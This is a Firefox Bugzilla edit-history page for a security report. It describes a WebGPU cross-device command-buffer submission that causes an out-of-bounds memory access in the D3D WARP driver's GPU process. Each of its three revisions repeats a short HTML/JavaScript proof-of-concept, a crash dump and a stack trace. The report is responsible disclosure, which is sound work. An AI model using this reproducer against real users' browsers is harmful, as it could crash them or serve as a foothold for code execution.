Bug 1856765 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by

Looben Yang

on 2023-10-03 18:51:36 PDT

VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Out Of Bound memory access in execute_command_lists in D3D backend. This bug has the potential to be exploited to execute arbitrary code in the GPU process.
	
	An adatper of device type gpu (wgpu_types::DeviceType IntegratedGpu or DiscreteGpu), then command encoder and command buffer can be created with this device by the following javascript code:

	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});
	
	
	By adding a "{forceFallbackAdapter:true}" parameter to JS function navigator.gpu.requestAdapter(), an adatper of device type cpu (wgpu_types::DeviceType Cpu) can be requested.
	
	The following rust code in instance.rs would filter the gpu devices and retain the only adapter of type cpu:

		pub fn request_adapter(...)
		...
							if force_software {
								adapters.retain(|exposed| exposed.info.device_type == wgt::DeviceType::Cpu);
							}
		...
		third_party/rust/wgpu-core/src/instance.rs

	Then, the command buffer created previously with a gpu device can be submitted to the D3D command queue of the cpu device:
	
	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});

	Somehow, the D3D dll does not check or handle this cross device submitting properly. The GPU process of Firefox crashes:
	
		(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
		d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
		00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	
	On a local built Firefox debug build, sometime I got this exception in the same fucntion d3d10warp.dll!UMCommandQueue::ExecuteCommandList by running the same PoC test case:
	
		Unhandled exception at 0x00007FF9FBD19717 (d3d10warp.dll) in firefox.exe: RangeChecks instrumentation code detected an out of range array access.

	It seems a out of bound array access.
	
	On some occasion with the same test case, I got the following exception instead:

		Unhandled exception at 0x00007FFBD90A9717 (d3d10warp.dll) in firefox.exe: An out of range switch jumptable entry was invoked.

	Looks like the bug can corrupt some structural data and change the course of code excecution. From this point of view, the bug may be possible to be exploited to execute arbitrary code in the GPU process.
	
	
VERSION
	Firefox:	120.0a1 (2023-09-30) (64-bit)
	OS:	Windows 11 Home 22H2 (Build 22621.2283)


REPRODUCTION CASE  (.)
	<script>
	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});

	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});
	</script>

    

Type of crash: gpu process

Crash State: 


	(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> r
	rax=00000000000001fd rbx=0000000000000000 rcx=000001fd54d29e00
	rdx=0000000000000000 rsi=000001fd54d29ed0 rdi=000000d200000000
	rip=00007ff9fbd183f0 rsp=000000d2b640bac0 rbp=000000d2b640bbc0
	 r8=00007ff9fbc40000  r9=0000000000000000 r10=0000000000000003
	r11=000000d2b640b0d0 r12=0000000000000000 r13=0000000000000000
	r14=0000000000000000 r15=000001fd54bddfa0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> dv
	Unable to enumerate locals, Win32 error 0n87
	Private symbols (symbols.pri) are required for locals.
	Type ".hh dbgerr005" for details.
	0:099> k
	 # Child-SP          RetAddr           Call Site
	00 000000d2`b640bac0 00007ff9`fbd180db d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0
	01 000000d2`b640bd60 00007ff9`c6cd5b81 d3d10warp!UMCommandQueue::ExecuteCommandLists+0x5b
	02 000000d2`b640bd90 00007ff9`c6cd548c D3D12Core!CCommandQueue<0>::ExecuteCommandListsImpl+0x611
	03 000000d2`b640be80 00007ff9`78ee1469 D3D12Core!CCommandQueue<0>::ExecuteCommandLists+0x3c
	04 000000d2`b640bec0 00007ff9`78e41ac7 xul!d3d12::com::ComPtr<winapi::um::d3d12::ID3D12CommandQueue>::execute_command_lists+0x79 [/builds/worker/checkouts/gecko/third_party/rust/d3d12/src/queue.rs @ 25] 
	05 000000d2`b640bf20 00007ff9`788c721c xul!wgpu_hal::dx12::impl$42::submit+0xd7 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/mod.rs @ 843] 
	06 000000d2`b640bf90 00007ff9`78972429 xul!wgpu_core::global::Global<wgpu_bindings::identity::IdentityRecyclerFactory>::queue_submit<wgpu_bindings::identity::IdentityRecyclerFactory,wgpu_hal::dx12::Api>+0x8ec [/builds/worker/checkouts/gecko/third_party/rust/wgpu-core/src/device/queue.rs @ 1369] 
	07 000000d2`b640eb20 00007ff9`76d2cb8d xul!wgpu_bindings::server::wgpu_server_queue_submit+0x69 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 923] 
	08 000000d2`b640ec50 00007ff9`76d2a703 xul!mozilla::webgpu::WebGPUParent::RecvQueueSubmit+0x8d [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 700] 
	09 000000d2`b640ef00 00007ff9`74183d9b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x2e43 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 1512] 
	0a 000000d2`b640f100 00007ff9`752d5dd9 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x1bb [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 269] 
	0b (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x81 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1800] 
	0c (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x365 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1725] 
	0d 000000d2`b640f1a0 00007ff9`73672100 xul!mozilla::ipc::MessageChannel::RunMessage+0x469 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1525] 
	0e 000000d2`b640f510 00007ff9`74faffa4 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x80 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1632] 
	0f 000000d2`b640f560 00007ff9`74fae25f xul!nsThread::ProcessNextEvent+0x19c4 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1193] 
	10 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480] 
	11 000000d2`b640fa30 00007ff9`73fa8d0f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x29f [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 330] 
	12 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370] 
	13 000000d2`b640fae0 00007ff9`73dcea1f xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364] 
	14 (Inline Function) --------`-------- xul!MessageLoop::Run+0x43 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345] 
	15 000000d2`b640fb30 00007ff9`c6e342d5 xul!nsThread::ThreadFunc+0x19f [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 370] 
	16 000000d2`b640fd10 00007ff9`c6eb8ee1 nss3!_PR_NativeRunThread+0x145 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	17 000000d2`b640fd90 00007ffa`04629363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	18 000000d2`b640fdc0 00007ffa`057d257d ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	19 000000d2`b640fdf0 00007ff9`ea54bce8 KERNEL32!BaseThreadInitThunk+0x1d
	1a (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	1b 000000d2`b640fe20 00007ffa`069eaa68 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 561] 
	1c 000000d2`b640fe90 00000000`00000000 ntdll!RtlUserThreadStart+0x28


	
CREDIT INFORMATION
Reporter credit: Looben Yang

Revision 1 by

Daniel Veditz [:dveditz]

on 2023-10-04 14:23:48 PDT

VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Out Of Bound memory access in execute_command_lists in D3D backend. This bug has the potential to be exploited to execute arbitrary code in the GPU process.
	
	An adatper of device type gpu (wgpu_types::DeviceType IntegratedGpu or DiscreteGpu), then command encoder and command buffer can be created with this device by the following javascript code:

	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});
	
	
	By adding a "{forceFallbackAdapter:true}" parameter to JS function navigator.gpu.requestAdapter(), an adatper of device type cpu (wgpu_types::DeviceType Cpu) can be requested.
	
	The following rust code in instance.rs would filter the gpu devices and retain the only adapter of type cpu:

		pub fn request_adapter(...)
		...
							if force_software {
								adapters.retain(|exposed| exposed.info.device_type == wgt::DeviceType::Cpu);
							}
		...
		third_party/rust/wgpu-core/src/instance.rs

	Then, the command buffer created previously with a gpu device can be submitted to the D3D command queue of the cpu device:
	
	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});

	Somehow, the D3D dll does not check or handle this cross device submitting properly. The GPU process of Firefox crashes:
	
		(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
		d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
		00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	
	On a local built Firefox debug build, sometime I got this exception in the same fucntion d3d10warp.dll!UMCommandQueue::ExecuteCommandList by running the same PoC test case:
	
		Unhandled exception at 0x00007FF9FBD19717 (d3d10warp.dll) in firefox.exe: RangeChecks instrumentation code detected an out of range array access.

	It seems a out of bound array access.
	
	On some occasion with the same test case, I got the following exception instead:

		Unhandled exception at 0x00007FFBD90A9717 (d3d10warp.dll) in firefox.exe: An out of range switch jumptable entry was invoked.

	Looks like the bug can corrupt some structural data and change the course of code excecution. From this point of view, the bug may be possible to be exploited to execute arbitrary code in the GPU process.
	
	
VERSION
	Firefox:	120.0a1 (2023-09-30) (64-bit)
	OS:	Windows 11 Home 22H2 (Build 22621.2283)


REPRODUCTION CASE  (.)
```HTML
	<script>
	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});

	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});
	</script>
```
    

Type of crash: gpu process

Crash State: 


	(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> r
	rax=00000000000001fd rbx=0000000000000000 rcx=000001fd54d29e00
	rdx=0000000000000000 rsi=000001fd54d29ed0 rdi=000000d200000000
	rip=00007ff9fbd183f0 rsp=000000d2b640bac0 rbp=000000d2b640bbc0
	 r8=00007ff9fbc40000  r9=0000000000000000 r10=0000000000000003
	r11=000000d2b640b0d0 r12=0000000000000000 r13=0000000000000000
	r14=0000000000000000 r15=000001fd54bddfa0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> dv
	Unable to enumerate locals, Win32 error 0n87
	Private symbols (symbols.pri) are required for locals.
	Type ".hh dbgerr005" for details.
	0:099> k
	 # Child-SP          RetAddr           Call Site
	00 000000d2`b640bac0 00007ff9`fbd180db d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0
	01 000000d2`b640bd60 00007ff9`c6cd5b81 d3d10warp!UMCommandQueue::ExecuteCommandLists+0x5b
	02 000000d2`b640bd90 00007ff9`c6cd548c D3D12Core!CCommandQueue<0>::ExecuteCommandListsImpl+0x611
	03 000000d2`b640be80 00007ff9`78ee1469 D3D12Core!CCommandQueue<0>::ExecuteCommandLists+0x3c
	04 000000d2`b640bec0 00007ff9`78e41ac7 xul!d3d12::com::ComPtr<winapi::um::d3d12::ID3D12CommandQueue>::execute_command_lists+0x79 [/builds/worker/checkouts/gecko/third_party/rust/d3d12/src/queue.rs @ 25] 
	05 000000d2`b640bf20 00007ff9`788c721c xul!wgpu_hal::dx12::impl$42::submit+0xd7 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/mod.rs @ 843] 
	06 000000d2`b640bf90 00007ff9`78972429 xul!wgpu_core::global::Global<wgpu_bindings::identity::IdentityRecyclerFactory>::queue_submit<wgpu_bindings::identity::IdentityRecyclerFactory,wgpu_hal::dx12::Api>+0x8ec [/builds/worker/checkouts/gecko/third_party/rust/wgpu-core/src/device/queue.rs @ 1369] 
	07 000000d2`b640eb20 00007ff9`76d2cb8d xul!wgpu_bindings::server::wgpu_server_queue_submit+0x69 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 923] 
	08 000000d2`b640ec50 00007ff9`76d2a703 xul!mozilla::webgpu::WebGPUParent::RecvQueueSubmit+0x8d [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 700] 
	09 000000d2`b640ef00 00007ff9`74183d9b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x2e43 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 1512] 
	0a 000000d2`b640f100 00007ff9`752d5dd9 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x1bb [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 269] 
	0b (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x81 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1800] 
	0c (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x365 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1725] 
	0d 000000d2`b640f1a0 00007ff9`73672100 xul!mozilla::ipc::MessageChannel::RunMessage+0x469 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1525] 
	0e 000000d2`b640f510 00007ff9`74faffa4 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x80 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1632] 
	0f 000000d2`b640f560 00007ff9`74fae25f xul!nsThread::ProcessNextEvent+0x19c4 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1193] 
	10 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480] 
	11 000000d2`b640fa30 00007ff9`73fa8d0f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x29f [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 330] 
	12 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370] 
	13 000000d2`b640fae0 00007ff9`73dcea1f xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364] 
	14 (Inline Function) --------`-------- xul!MessageLoop::Run+0x43 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345] 
	15 000000d2`b640fb30 00007ff9`c6e342d5 xul!nsThread::ThreadFunc+0x19f [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 370] 
	16 000000d2`b640fd10 00007ff9`c6eb8ee1 nss3!_PR_NativeRunThread+0x145 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	17 000000d2`b640fd90 00007ffa`04629363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	18 000000d2`b640fdc0 00007ffa`057d257d ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	19 000000d2`b640fdf0 00007ff9`ea54bce8 KERNEL32!BaseThreadInitThunk+0x1d
	1a (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	1b 000000d2`b640fe20 00007ffa`069eaa68 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 561] 
	1c 000000d2`b640fe90 00000000`00000000 ntdll!RtlUserThreadStart+0x28


	
CREDIT INFORMATION
Reporter credit: Looben Yang

Revision 2 by

Daniel Veditz [:dveditz]

on 2023-10-04 14:25:34 PDT

VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Out Of Bound memory access in execute_command_lists in D3D backend. This bug has the potential to be exploited to execute arbitrary code in the GPU process.
	
An adatper of device type gpu (wgpu_types::DeviceType IntegratedGpu or DiscreteGpu), then command encoder and command buffer can be created with this device by the following javascript code:

	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});
	
	
By adding a "{forceFallbackAdapter:true}" parameter to JS function navigator.gpu.requestAdapter(), an adatper of device type cpu (wgpu_types::DeviceType Cpu) can be requested.
	
The following rust code in instance.rs would filter the gpu devices and retain the only adapter of type cpu:

		pub fn request_adapter(...)
		...
							if force_software {
								adapters.retain(|exposed| exposed.info.device_type == wgt::DeviceType::Cpu);
							}
		...
		third_party/rust/wgpu-core/src/instance.rs

Then, the command buffer created previously with a gpu device can be submitted to the D3D command queue of the cpu device:
	
	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});

Somehow, the D3D dll does not check or handle this cross device submitting properly. The GPU process of Firefox crashes:
	
		(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
		d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
		00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	
On a local built Firefox debug build, sometime I got this exception in the same fucntion d3d10warp.dll!UMCommandQueue::ExecuteCommandList by running the same PoC test case:
	
		Unhandled exception at 0x00007FF9FBD19717 (d3d10warp.dll) in firefox.exe: RangeChecks instrumentation code detected an out of range array access.

It seems a out of bound array access.
	
On some occasion with the same test case, I got the following exception instead:

		Unhandled exception at 0x00007FFBD90A9717 (d3d10warp.dll) in firefox.exe: An out of range switch jumptable entry was invoked.

Looks like the bug can corrupt some structural data and change the course of code excecution. From this point of view, the bug may be possible to be exploited to execute arbitrary code in the GPU process.
	
	
VERSION
  Firefox:	120.0a1 (2023-09-30) (64-bit)
  OS:	Windows 11 Home 22H2 (Build 22621.2283)


REPRODUCTION CASE  (.)
```HTML
	<script>
	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});

	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});
	</script>
```
    

Type of crash: gpu process

Crash State: 


	(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> r
	rax=00000000000001fd rbx=0000000000000000 rcx=000001fd54d29e00
	rdx=0000000000000000 rsi=000001fd54d29ed0 rdi=000000d200000000
	rip=00007ff9fbd183f0 rsp=000000d2b640bac0 rbp=000000d2b640bbc0
	 r8=00007ff9fbc40000  r9=0000000000000000 r10=0000000000000003
	r11=000000d2b640b0d0 r12=0000000000000000 r13=0000000000000000
	r14=0000000000000000 r15=000001fd54bddfa0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> dv
	Unable to enumerate locals, Win32 error 0n87
	Private symbols (symbols.pri) are required for locals.
	Type ".hh dbgerr005" for details.
	0:099> k
	 # Child-SP          RetAddr           Call Site
	00 000000d2`b640bac0 00007ff9`fbd180db d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0
	01 000000d2`b640bd60 00007ff9`c6cd5b81 d3d10warp!UMCommandQueue::ExecuteCommandLists+0x5b
	02 000000d2`b640bd90 00007ff9`c6cd548c D3D12Core!CCommandQueue<0>::ExecuteCommandListsImpl+0x611
	03 000000d2`b640be80 00007ff9`78ee1469 D3D12Core!CCommandQueue<0>::ExecuteCommandLists+0x3c
	04 000000d2`b640bec0 00007ff9`78e41ac7 xul!d3d12::com::ComPtr<winapi::um::d3d12::ID3D12CommandQueue>::execute_command_lists+0x79 [/builds/worker/checkouts/gecko/third_party/rust/d3d12/src/queue.rs @ 25] 
	05 000000d2`b640bf20 00007ff9`788c721c xul!wgpu_hal::dx12::impl$42::submit+0xd7 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/mod.rs @ 843] 
	06 000000d2`b640bf90 00007ff9`78972429 xul!wgpu_core::global::Global<wgpu_bindings::identity::IdentityRecyclerFactory>::queue_submit<wgpu_bindings::identity::IdentityRecyclerFactory,wgpu_hal::dx12::Api>+0x8ec [/builds/worker/checkouts/gecko/third_party/rust/wgpu-core/src/device/queue.rs @ 1369] 
	07 000000d2`b640eb20 00007ff9`76d2cb8d xul!wgpu_bindings::server::wgpu_server_queue_submit+0x69 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 923] 
	08 000000d2`b640ec50 00007ff9`76d2a703 xul!mozilla::webgpu::WebGPUParent::RecvQueueSubmit+0x8d [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 700] 
	09 000000d2`b640ef00 00007ff9`74183d9b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x2e43 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 1512] 
	0a 000000d2`b640f100 00007ff9`752d5dd9 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x1bb [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 269] 
	0b (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x81 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1800] 
	0c (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x365 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1725] 
	0d 000000d2`b640f1a0 00007ff9`73672100 xul!mozilla::ipc::MessageChannel::RunMessage+0x469 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1525] 
	0e 000000d2`b640f510 00007ff9`74faffa4 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x80 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1632] 
	0f 000000d2`b640f560 00007ff9`74fae25f xul!nsThread::ProcessNextEvent+0x19c4 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1193] 
	10 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480] 
	11 000000d2`b640fa30 00007ff9`73fa8d0f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x29f [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 330] 
	12 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370] 
	13 000000d2`b640fae0 00007ff9`73dcea1f xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364] 
	14 (Inline Function) --------`-------- xul!MessageLoop::Run+0x43 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345] 
	15 000000d2`b640fb30 00007ff9`c6e342d5 xul!nsThread::ThreadFunc+0x19f [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 370] 
	16 000000d2`b640fd10 00007ff9`c6eb8ee1 nss3!_PR_NativeRunThread+0x145 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	17 000000d2`b640fd90 00007ffa`04629363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	18 000000d2`b640fdc0 00007ffa`057d257d ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	19 000000d2`b640fdf0 00007ff9`ea54bce8 KERNEL32!BaseThreadInitThunk+0x1d
	1a (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	1b 000000d2`b640fe20 00007ffa`069eaa68 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 561] 
	1c 000000d2`b640fe90 00000000`00000000 ntdll!RtlUserThreadStart+0x28


	
CREDIT INFORMATION
Reporter credit: Looben Yang

Back to Bug 1856765 Comment 0